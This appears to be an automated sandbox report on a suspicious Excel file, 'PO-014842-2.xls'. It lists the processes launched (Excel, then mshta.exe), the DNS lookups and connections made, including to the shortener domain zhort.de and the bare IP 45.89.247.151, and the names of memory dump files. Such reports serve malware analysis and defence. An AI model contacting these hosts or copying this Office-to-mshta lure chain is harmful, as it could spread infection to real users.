"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 173.222.211.43:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 43.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

memory/5024-1-0x00007FFE91A2D000-0x00007FFE91A2E000-memory.dmp

memory/5024-0-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-2-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-3-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-4-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-6-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-9-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-10-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-12-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-11-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-13-0x00007FFE4F9B0000-0x00007FFE4F9C0000-memory.dmp

memory/5024-16-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-17-0x00007FFE4F9B0000-0x00007FFE4F9C0000-memory.dmp

memory/5024-15-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-14-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-8-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-5-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-7-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/2012-38-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/2012-41-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/2012-40-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/2012-43-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/2012-42-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-45-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/5024-46-0x00007FFE91A2D000-0x00007FFE91A2E000-memory.dmp

memory/2012-47-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp

memory/2012-48-0x00007FF7A29A0000-0x00007FF7A29A8000-memory.dmp

memory/5024-77-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-78-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-80-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-79-0x00007FFE51A10000-0x00007FFE51A20000-memory.dmp

memory/5024-81-0x00007FFE91990000-0x00007FFE91B85000-memory.dmp